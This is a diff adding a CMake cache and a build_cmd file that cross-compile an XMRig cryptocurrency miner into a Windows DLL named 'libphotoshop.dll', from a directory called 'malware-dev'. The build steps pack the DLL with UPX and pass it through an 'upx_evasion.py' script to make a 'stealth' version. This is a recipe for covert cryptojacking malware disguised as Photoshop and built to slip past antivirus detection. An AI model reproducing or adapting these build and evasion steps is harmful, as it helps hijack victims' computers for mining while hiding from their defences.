+CMAKE_C_COMPILER_RANLIB:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ranlib + +//Flags used by the C compiler during all build types. +CMAKE_C_FLAGS:STRING= + +//Flags used by the C compiler during DEBUG builds. +CMAKE_C_FLAGS_DEBUG:STRING=-g + +//Flags used by the C compiler during MINSIZEREL builds. +CMAKE_C_FLAGS_MINSIZEREL:STRING=-Os -DNDEBUG + +//Flags used by the C compiler during RELEASE builds. +CMAKE_C_FLAGS_RELEASE:STRING=-O3 -DNDEBUG + +//Flags used by the C compiler during RELWITHDEBINFO builds. +CMAKE_C_FLAGS_RELWITHDEBINFO:STRING=-O2 -g -DNDEBUG + +//Libraries linked by default with all C applications. +CMAKE_C_STANDARD_LIBRARIES:STRING=-lkernel32 -luser32 -lgdi32 -lwinspool -lshell32 -lole32 -loleaut32 -luuid -lcomdlg32 -ladvapi32 + +//Path to a program. +CMAKE_DLLTOOL:FILEPATH=/opt/llvm-mingw/bin/llvm-dlltool + +//Flags used by the linker during all build types. +CMAKE_EXE_LINKER_FLAGS:STRING= + +//Flags used by the linker during DEBUG builds. +CMAKE_EXE_LINKER_FLAGS_DEBUG:STRING= + +//Flags used by the linker during MINSIZEREL builds. +CMAKE_EXE_LINKER_FLAGS_MINSIZEREL:STRING= + +//Flags used by the linker during RELEASE builds. +CMAKE_EXE_LINKER_FLAGS_RELEASE:STRING= + +//Flags used by the linker during RELWITHDEBINFO builds. +CMAKE_EXE_LINKER_FLAGS_RELWITHDEBINFO:STRING= + +//Enable/Disable output of build database during the build. +CMAKE_EXPORT_BUILD_DATABASE:BOOL= + +//Enable/Disable output of compile commands during generation. +CMAKE_EXPORT_COMPILE_COMMANDS:BOOL= + +//Value Computed by CMake. +CMAKE_FIND_PACKAGE_REDIRECTS_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build/CMakeFiles/pkgRedirects + +//Convert GNU import libraries to MS format (requires Visual Studio) +CMAKE_GNUtoMS:BOOL=OFF + +//Install path prefix, prepended onto install directories. +CMAKE_INSTALL_PREFIX:PATH=/usr/local + +//Path to a program. +CMAKE_LINKER:FILEPATH=/opt/llvm-mingw/bin/ld.lld + +//Program used to build from build.ninja files. +CMAKE_MAKE_PROGRAM:FILEPATH=/home/someone/.pyenv/shims/ninja + +//Flags used by the linker during the creation of modules during +// all build types. +CMAKE_MODULE_LINKER_FLAGS:STRING= + +//Flags used by the linker during the creation of modules during +// DEBUG builds. +CMAKE_MODULE_LINKER_FLAGS_DEBUG:STRING= + +//Flags used by the linker during the creation of modules during +// MINSIZEREL builds. +CMAKE_MODULE_LINKER_FLAGS_MINSIZEREL:STRING= + +//Flags used by the linker during the creation of modules during +// RELEASE builds. +CMAKE_MODULE_LINKER_FLAGS_RELEASE:STRING= + +//Flags used by the linker during the creation of modules during +// RELWITHDEBINFO builds. +CMAKE_MODULE_LINKER_FLAGS_RELWITHDEBINFO:STRING= + +//Path to a program. +CMAKE_NM:FILEPATH=/opt/llvm-mingw/bin/llvm-nm + +//Path to a program. +CMAKE_OBJCOPY:FILEPATH=/opt/llvm-mingw/bin/llvm-objcopy + +//Path to a program. +CMAKE_OBJDUMP:FILEPATH=/opt/llvm-mingw/bin/llvm-objdump + +//Value Computed by CMake +CMAKE_PROJECT_COMPAT_VERSION:STATIC= + +//Value Computed by CMake +CMAKE_PROJECT_DESCRIPTION:STATIC= + +//Value Computed by CMake +CMAKE_PROJECT_HOMEPAGE_URL:STATIC= + +//Value Computed by CMake +CMAKE_PROJECT_NAME:STATIC=photoshop + +//Path to a program. +CMAKE_RANLIB:FILEPATH=/opt/llvm-mingw/bin/x86_64-w64-mingw32-llvm-ranlib + +//No help, variable specified on the command line. +CMAKE_RC_COMPILER:UNINITIALIZED=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres + +//Flags for Windows Resource Compiler during all build types. +CMAKE_RC_FLAGS:STRING= + +//Flags for Windows Resource Compiler during DEBUG builds. +CMAKE_RC_FLAGS_DEBUG:STRING= + +//Flags for Windows Resource Compiler during MINSIZEREL builds. +CMAKE_RC_FLAGS_MINSIZEREL:STRING= + +//Flags for Windows Resource Compiler during RELEASE builds. +CMAKE_RC_FLAGS_RELEASE:STRING= + +//Flags for Windows Resource Compiler during RELWITHDEBINFO builds. +CMAKE_RC_FLAGS_RELWITHDEBINFO:STRING= + +//Path to a program. +CMAKE_READELF:FILEPATH=/opt/llvm-mingw/bin/llvm-readelf + +//Flags used by the linker during the creation of shared libraries +// during all build types. +CMAKE_SHARED_LINKER_FLAGS:STRING= + +//Flags used by the linker during the creation of shared libraries +// during DEBUG builds. +CMAKE_SHARED_LINKER_FLAGS_DEBUG:STRING= + +//Flags used by the linker during the creation of shared libraries +// during MINSIZEREL builds. +CMAKE_SHARED_LINKER_FLAGS_MINSIZEREL:STRING= + +//Flags used by the linker during the creation of shared libraries +// during RELEASE builds. +CMAKE_SHARED_LINKER_FLAGS_RELEASE:STRING= + +//Flags used by the linker during the creation of shared libraries +// during RELWITHDEBINFO builds. +CMAKE_SHARED_LINKER_FLAGS_RELWITHDEBINFO:STRING= + +//If set, runtime paths are not added when installing shared libraries, +// but are added when building. +CMAKE_SKIP_INSTALL_RPATH:BOOL=NO + +//If set, runtime paths are not added when using shared libraries. +CMAKE_SKIP_RPATH:BOOL=NO + +//Flags used by the archiver during the creation of static libraries +// during all build types. +CMAKE_STATIC_LINKER_FLAGS:STRING= + +//Flags used by the archiver during the creation of static libraries +// during DEBUG builds. +CMAKE_STATIC_LINKER_FLAGS_DEBUG:STRING= + +//Flags used by the archiver during the creation of static libraries +// during MINSIZEREL builds. +CMAKE_STATIC_LINKER_FLAGS_MINSIZEREL:STRING= + +//Flags used by the archiver during the creation of static libraries +// during RELEASE builds. +CMAKE_STATIC_LINKER_FLAGS_RELEASE:STRING= + +//Flags used by the archiver during the creation of static libraries +// during RELWITHDEBINFO builds. +CMAKE_STATIC_LINKER_FLAGS_RELWITHDEBINFO:STRING= + +//Path to a program. +CMAKE_STRIP:FILEPATH=/opt/llvm-mingw/bin/llvm-strip + +//No help, variable specified on the command line. +CMAKE_SYSTEM_NAME:UNINITIALIZED=Windows + +//Path to a program. +CMAKE_TAPI:FILEPATH=CMAKE_TAPI-NOTFOUND + +//If this value is on, makefiles will be generated without the +// .SILENT directive, and all commands will be echoed to the console +// during the make. This is useful for debugging only. With Visual +// Studio IDE projects all commands are done without /nologo. +CMAKE_VERBOSE_MAKEFILE:BOOL=FALSE + +//Value Computed by CMake +GhostRider_BINARY_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build/src/crypto/ghostrider + +//Value Computed by CMake +GhostRider_IS_TOP_LEVEL:STATIC=OFF + +//Value Computed by CMake +GhostRider_SOURCE_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/src/crypto/ghostrider + +//Enable hwloc debug helpers and log +HWLOC_DEBUG:BOOL=OFF + +//Path to a file. +HWLOC_INCLUDE_DIR:PATH=/home/someone/xmrig-deps/gcc/x64/include + +//Path to a library. +HWLOC_LIBRARY:FILEPATH=/home/someone/xmrig-deps/gcc/x64/lib/libhwloc.a + +//Path to a library. +LIB_EAY:FILEPATH=/home/someone/xmrig-deps/gcc/x64/lib/libcrypto.a + +//Path to a file. +OPENSSL_INCLUDE_DIR:PATH=/home/someone/xmrig-deps/gcc/x64/include + +//Path to a library. +SSL_EAY:FILEPATH=/home/someone/xmrig-deps/gcc/x64/lib/libssl.a + +//Path to a file. +UV_INCLUDE_DIR:PATH=/home/someone/xmrig-deps/gcc/x64/include + +//Path to a library. +UV_LIBRARY:FILEPATH=/home/someone/xmrig-deps/gcc/x64/lib/libuv.a + +//Enable ADL (AMD Display Library) or sysfs support (only if OpenCL +// backend enabled) +WITH_ADL:BOOL=OFF + +//Enable Argon2 algorithms family +WITH_ARGON2:BOOL=ON + +//Enable ASM PoW implementations +WITH_ASM:BOOL=ON + +//Enable AVX2 for Blake2 +WITH_AVX2:BOOL=ON + +//Enable builtin RandomX benchmark and stress test +WITH_BENCHMARK:BOOL=OFF + +//Enable CryptoNight-UPX2 algorithm +WITH_CN_FEMTO:BOOL=ON + +//Enable CryptoNight-Heavy algorithms family +WITH_CN_HEAVY:BOOL=ON + +//Enable CryptoNight-Lite algorithms family +WITH_CN_LITE:BOOL=ON + +//Enable CryptoNight-Pico algorithm +WITH_CN_PICO:BOOL=ON + +//Enable CUDA backend +WITH_CUDA:BOOL=OFF + +//Enable debug log output +WITH_DEBUG_LOG:BOOL=OFF + +//Enable DMI/SMBIOS reader +WITH_DMI:BOOL=ON + +//Enable internal embedded JSON config +WITH_EMBEDDED_CONFIG:BOOL=ON + +//Enable environment variables support in config file +WITH_ENV_VARS:BOOL=OFF + +//Enable GhostRider algorithm +WITH_GHOSTRIDER:BOOL=ON + +//Enable HTTP protocol support (client/server) +WITH_HTTP:BOOL=ON + +//Enable hwloc support +WITH_HWLOC:BOOL=ON + +//Enable debug log for threads interleave +WITH_INTERLEAVE_DEBUG_LOG:BOOL=OFF + +//Enable KawPow algorithms family +WITH_KAWPOW:BOOL=ON + +//Enable MSR mod & 1st-gen Ryzen fix +WITH_MSR:BOOL=ON + +//Enable NVML (NVIDIA Management Library) support (only if CUDA +// backend enabled) +WITH_NVML:BOOL=OFF + +//Enable OpenCL backend +WITH_OPENCL:BOOL=OFF + +//Target OpenCL version +WITH_OPENCL_VERSION:STRING=200 + +//Enable profiling for developers +WITH_PROFILING:BOOL=OFF + +//Enable RandomX algorithms family +WITH_RANDOMX:BOOL=ON + +//Enable secure access to JIT memory +WITH_SECURE_JIT:BOOL=OFF + +//Enable SSE 4.1 for Blake2 +WITH_SSE4_1:BOOL=ON + +//Enable strict checks for OpenCL cache +WITH_STRICT_CACHE:BOOL=ON + +//Enable OpenSSL support +WITH_TLS:BOOL=ON + +//Enable VAES instructions for Cryptonight +WITH_VAES:BOOL=ON + +//No help, variable specified on the command line. +XMRIG_DEPS:UNINITIALIZED=/home/someone/xmrig-deps/gcc/x64 + +//Value Computed by CMake +argon2_BINARY_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build/src/3rdparty/argon2 + +//Value Computed by CMake +argon2_IS_TOP_LEVEL:STATIC=OFF + +//Dependencies for the target +argon2_LIB_DEPENDS:STATIC=general;argon2-sse2;general;argon2-ssse3;general;argon2-xop;general;argon2-avx2;general;argon2-avx512f; + +//Value Computed by CMake +argon2_SOURCE_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/src/3rdparty/argon2 + +//Value Computed by CMake +ethash_BINARY_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build/src/3rdparty/libethash + +//Value Computed by CMake +ethash_IS_TOP_LEVEL:STATIC=OFF + +//Value Computed by CMake +ethash_SOURCE_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/src/3rdparty/libethash + +//Value Computed by CMake +photoshop_BINARY_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll/build + +//Value Computed by CMake +photoshop_IS_TOP_LEVEL:STATIC=ON + +//Dependencies for the target +photoshop_LIB_DEPENDS:STATIC=general;xmrig-asm;general;/home/someone/xmrig-deps/gcc/x64/lib/libssl.a;general;/home/someone/xmrig-deps/gcc/x64/lib/libcrypto.a;general;/home/someone/xmrig-deps/gcc/x64/lib/libuv.a;general;ws2_32;general;psapi;general;iphlpapi;general;userenv;general;dbghelp;general;crypt32;general;/home/someone/xmrig-deps/gcc/x64/lib/libhwloc.a;general;argon2;general;ethash;general;ghostrider;general;pthread; + +//Value Computed by CMake +photoshop_SOURCE_DIR:STATIC=/home/someone/malware-dev/xmrig-minimized-dll + + +######################## +# INTERNAL cache entries +######################## + +//ADVANCED property for variable: CMAKE_ADDR2LINE +CMAKE_ADDR2LINE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_AR +CMAKE_AR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_COMPILER +CMAKE_ASM_COMPILER-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_COMPILER_AR +CMAKE_ASM_COMPILER_AR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_COMPILER_CLANG_SCAN_DEPS +CMAKE_ASM_COMPILER_CLANG_SCAN_DEPS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_COMPILER_RANLIB +CMAKE_ASM_COMPILER_RANLIB-ADVANCED:INTERNAL=1 +CMAKE_ASM_COMPILER_WORKS:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS +CMAKE_ASM_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS_DEBUG +CMAKE_ASM_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS_MINSIZEREL +CMAKE_ASM_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS_RELEASE +CMAKE_ASM_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_ASM_FLAGS_RELWITHDEBINFO +CMAKE_ASM_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//This is the directory where this CMakeCache.txt was created +CMAKE_CACHEFILE_DIR:INTERNAL=/home/someone/malware-dev/xmrig-minimized-dll/build +//Major version of cmake used to create the current loaded cache +CMAKE_CACHE_MAJOR_VERSION:INTERNAL=4 +//Minor version of cmake used to create the current loaded cache +CMAKE_CACHE_MINOR_VERSION:INTERNAL=1 +//Patch version of cmake used to create the current loaded cache +CMAKE_CACHE_PATCH_VERSION:INTERNAL=2 +//Path to CMake executable. +CMAKE_COMMAND:INTERNAL=/usr/bin/cmake +//Path to cpack program executable. +CMAKE_CPACK_COMMAND:INTERNAL=/usr/bin/cpack +//Path to ctest program executable. +CMAKE_CTEST_COMMAND:INTERNAL=/usr/bin/ctest +//ADVANCED property for variable: CMAKE_CXX_COMPILER +CMAKE_CXX_COMPILER-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_COMPILER_AR +CMAKE_CXX_COMPILER_AR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_COMPILER_CLANG_SCAN_DEPS +CMAKE_CXX_COMPILER_CLANG_SCAN_DEPS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_COMPILER_RANLIB +CMAKE_CXX_COMPILER_RANLIB-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS +CMAKE_CXX_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS_DEBUG +CMAKE_CXX_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS_MINSIZEREL +CMAKE_CXX_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS_RELEASE +CMAKE_CXX_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_FLAGS_RELWITHDEBINFO +CMAKE_CXX_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_CXX_STANDARD_LIBRARIES +CMAKE_CXX_STANDARD_LIBRARIES-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_COMPILER +CMAKE_C_COMPILER-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_COMPILER_AR +CMAKE_C_COMPILER_AR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_COMPILER_CLANG_SCAN_DEPS +CMAKE_C_COMPILER_CLANG_SCAN_DEPS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_COMPILER_RANLIB +CMAKE_C_COMPILER_RANLIB-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS +CMAKE_C_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS_DEBUG +CMAKE_C_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS_MINSIZEREL +CMAKE_C_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS_RELEASE +CMAKE_C_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_FLAGS_RELWITHDEBINFO +CMAKE_C_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_C_STANDARD_LIBRARIES +CMAKE_C_STANDARD_LIBRARIES-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_DLLTOOL +CMAKE_DLLTOOL-ADVANCED:INTERNAL=1 +//Path to cache edit program executable. +CMAKE_EDIT_COMMAND:INTERNAL=/usr/bin/ccmake +//Executable file format +CMAKE_EXECUTABLE_FORMAT:INTERNAL=Unknown +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS +CMAKE_EXE_LINKER_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS_DEBUG +CMAKE_EXE_LINKER_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS_MINSIZEREL +CMAKE_EXE_LINKER_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS_RELEASE +CMAKE_EXE_LINKER_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXE_LINKER_FLAGS_RELWITHDEBINFO +CMAKE_EXE_LINKER_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXPORT_BUILD_DATABASE +CMAKE_EXPORT_BUILD_DATABASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_EXPORT_COMPILE_COMMANDS +CMAKE_EXPORT_COMPILE_COMMANDS-ADVANCED:INTERNAL=1 +//Name of external makefile project generator. +CMAKE_EXTRA_GENERATOR:INTERNAL= +//Name of generator. +CMAKE_GENERATOR:INTERNAL=Ninja +//Generator instance identifier. +CMAKE_GENERATOR_INSTANCE:INTERNAL= +//Name of generator platform. +CMAKE_GENERATOR_PLATFORM:INTERNAL= +//Name of generator toolset. +CMAKE_GENERATOR_TOOLSET:INTERNAL= +//Source directory with the top level CMakeLists.txt file for this +// project +CMAKE_HOME_DIRECTORY:INTERNAL=/home/someone/malware-dev/xmrig-minimized-dll +//ADVANCED property for variable: CMAKE_LINKER +CMAKE_LINKER-ADVANCED:INTERNAL=1 +//Name of CMakeLists files to read +CMAKE_LIST_FILE_NAME:INTERNAL=CMakeLists.txt +//ADVANCED property for variable: CMAKE_MAKE_PROGRAM +CMAKE_MAKE_PROGRAM-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS +CMAKE_MODULE_LINKER_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS_DEBUG +CMAKE_MODULE_LINKER_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS_MINSIZEREL +CMAKE_MODULE_LINKER_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS_RELEASE +CMAKE_MODULE_LINKER_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_MODULE_LINKER_FLAGS_RELWITHDEBINFO +CMAKE_MODULE_LINKER_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_NM +CMAKE_NM-ADVANCED:INTERNAL=1 +//number of local generators +CMAKE_NUMBER_OF_MAKEFILES:INTERNAL=4 +//ADVANCED property for variable: CMAKE_OBJCOPY +CMAKE_OBJCOPY-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_OBJDUMP +CMAKE_OBJDUMP-ADVANCED:INTERNAL=1 +//Platform information initialized +CMAKE_PLATFORM_INFO_INITIALIZED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RANLIB +CMAKE_RANLIB-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_COMPILER +CMAKE_RC_COMPILER-ADVANCED:INTERNAL=1 +CMAKE_RC_COMPILER_WORKS:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS +CMAKE_RC_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS_DEBUG +CMAKE_RC_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS_MINSIZEREL +CMAKE_RC_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS_RELEASE +CMAKE_RC_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_RC_FLAGS_RELWITHDEBINFO +CMAKE_RC_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_READELF +CMAKE_READELF-ADVANCED:INTERNAL=1 +//Path to CMake installation. +CMAKE_ROOT:INTERNAL=/usr/share/cmake +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS +CMAKE_SHARED_LINKER_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS_DEBUG +CMAKE_SHARED_LINKER_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS_MINSIZEREL +CMAKE_SHARED_LINKER_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS_RELEASE +CMAKE_SHARED_LINKER_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SHARED_LINKER_FLAGS_RELWITHDEBINFO +CMAKE_SHARED_LINKER_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SKIP_INSTALL_RPATH +CMAKE_SKIP_INSTALL_RPATH-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_SKIP_RPATH +CMAKE_SKIP_RPATH-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS +CMAKE_STATIC_LINKER_FLAGS-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS_DEBUG +CMAKE_STATIC_LINKER_FLAGS_DEBUG-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS_MINSIZEREL +CMAKE_STATIC_LINKER_FLAGS_MINSIZEREL-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS_RELEASE +CMAKE_STATIC_LINKER_FLAGS_RELEASE-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STATIC_LINKER_FLAGS_RELWITHDEBINFO +CMAKE_STATIC_LINKER_FLAGS_RELWITHDEBINFO-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_STRIP +CMAKE_STRIP-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: CMAKE_TAPI +CMAKE_TAPI-ADVANCED:INTERNAL=1 +//uname command +CMAKE_UNAME:INTERNAL=/usr/bin/uname +//ADVANCED property for variable: CMAKE_VERBOSE_MAKEFILE +CMAKE_VERBOSE_MAKEFILE-ADVANCED:INTERNAL=1 +//Test FEATURE_avx2_FLAG +FEATURE_avx2_FLAG:INTERNAL=1 +//Test FEATURE_avx2_NOFLAG +FEATURE_avx2_NOFLAG:INTERNAL= +//Test FEATURE_avx512f_FLAG +FEATURE_avx512f_FLAG:INTERNAL=1 +//Test FEATURE_avx512f_NOFLAG +FEATURE_avx512f_NOFLAG:INTERNAL= +//Test FEATURE_sse2_NOFLAG +FEATURE_sse2_NOFLAG:INTERNAL=1 +//Test FEATURE_ssse3_FLAG +FEATURE_ssse3_FLAG:INTERNAL=1 +//Test FEATURE_ssse3_NOFLAG +FEATURE_ssse3_NOFLAG:INTERNAL= +//Test FEATURE_xop_FLAG +FEATURE_xop_FLAG:INTERNAL= +//Test FEATURE_xop_NOFLAG +FEATURE_xop_NOFLAG:INTERNAL= +//Details about finding HWLOC +FIND_PACKAGE_MESSAGE_DETAILS_HWLOC:INTERNAL=[/home/someone/xmrig-deps/gcc/x64/lib/libhwloc.a][/home/someone/xmrig-deps/gcc/x64/include][v()] +//Details about finding OpenSSL +FIND_PACKAGE_MESSAGE_DETAILS_OpenSSL:INTERNAL=[/home/someone/xmrig-deps/gcc/x64/lib/libcrypto.a][/home/someone/xmrig-deps/gcc/x64/include][ ][v3.0.16()] +//Details about finding UV +FIND_PACKAGE_MESSAGE_DETAILS_UV:INTERNAL=[/home/someone/xmrig-deps/gcc/x64/lib/libuv.a][/home/someone/xmrig-deps/gcc/x64/include][v()] +//Have symbol _aligned_malloc +HAVE_ALIGNED_MALLOC:INTERNAL=1 +//Have symbol _rotr +HAVE_ROTR:INTERNAL=1 +//ADVANCED property for variable: LIB_EAY +LIB_EAY-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: OPENSSL_INCLUDE_DIR +OPENSSL_INCLUDE_DIR-ADVANCED:INTERNAL=1 +//ADVANCED property for variable: SSL_EAY +SSL_EAY-ADVANCED:INTERNAL=1 +//Test VAES_SUPPORTED +VAES_SUPPORTED:INTERNAL=1 +//STRINGS property for variable: WITH_OPENCL_VERSION +WITH_OPENCL_VERSION-STRINGS:INTERNAL=120;200;210;220 + + diff --git a/build_cmd b/build_cmd new file mode 100644 index 00000000..9cf76f41 --- /dev/null +++ b/build_cmd @@ -0,0 +1,80 @@ + cmake -G Ninja .. \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_SYSTEM_NAME=Windows \ + -DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \ + -DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \ + -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \ + -DCMAKE_FIND_LIBRARY_SUFFIXES=".a" \ + -DWITH_TLS=ON \ + -DWITH_EMBEDDED_CONFIG=ON \ + -DCMAKE_C_FLAGS="-static -fPIC -mtune=generic -fno-lto -Wno-unused-command-line-argument -D_WIN32_WINNT=0x0601 -D__USE_MINGW_ANSI_STDIO=0" \ + -DCMAKE_CXX_FLAGS="-static -fPIC -mtune=generic -fno-lto -Wno-unused-command-line-argument -D_WIN32_WINNT=0x0601 -D__USE_MINGW_ANSI_STDIO=0" \ + -DCMAKE_SHARED_LINKER_FLAGS="-static -Wl,-Bstatic -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive -Wl,--allow-multiple-definition -Wl,--start-group -lmingw32 -lmingwex -lmsvcrt -lkernel32 -luser32 -ladvapi32 -lws2_32 -lpsapi -liphlpapi -luserenv -ldbghelp -lssp -lstdc++ -lstdc++fs -Wl,-lmsvcrt -Wl,-lmingwex -Wl,-lmingw32 -Wl,-lwinpthread -Wl,-lmsvcrt -Wl,-lkernel32 -Wl,-luser32 -Wl,-ladvapi32 -Wl,-lws2_32 -Wl,-lpsapi -Wl,-liphlpapi -Wl,-luserenv -Wl,-ldbghelp -Wl,-lssp -Wl,--end-group" \ + -DCMAKE_EXE_LINKER_FLAGS="-static -Wl,-Bstatic -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive -Wl,--allow-multiple-definition" + + ninja -j10 + +upx --best --lzma libphotoshop.dll -o libphotoshop_packed.dll + python3 ../upx_evasion.py libphotoshop_packed.dll -o libphotoshop_stealth.dll --keep-relocs + + && x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.dll + + +OR for gcc use + +cmake .. -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=x86_64-w64-mingw32-gcc -DCMAKE_CXX_COMPILER=x86_64-w64-mingw32-g++ -DWITH_TLS=ON -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 -DCMAKE_SYSTEM_NAME=Windows -DCMAKE_SYSTEM_PROCESSOR=x86_64 -DWITH_EMBEDDED_CONFIG=ON && make -j $(nproc) + + +OR for CREATING ONE EXE WITHOUT DEPENDENCIES + + cmake -G Ninja .. \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_SYSTEM_NAME=Windows \ + -DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \ + -DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \ + -DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \ + -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \ + -DWITH_TLS=ON \ + -DWITH_EMBEDDED_CONFIG=ON + ninja -j10 + + + x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.a \ + -static -static-libgcc 